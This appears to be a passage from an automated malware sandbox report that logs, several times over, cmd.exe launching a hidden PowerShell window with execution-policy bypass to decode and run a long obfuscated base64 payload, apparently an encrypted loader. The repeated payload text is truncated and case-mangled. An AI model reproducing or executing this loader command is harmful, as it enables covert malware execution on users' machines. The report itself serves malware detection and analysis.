31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vt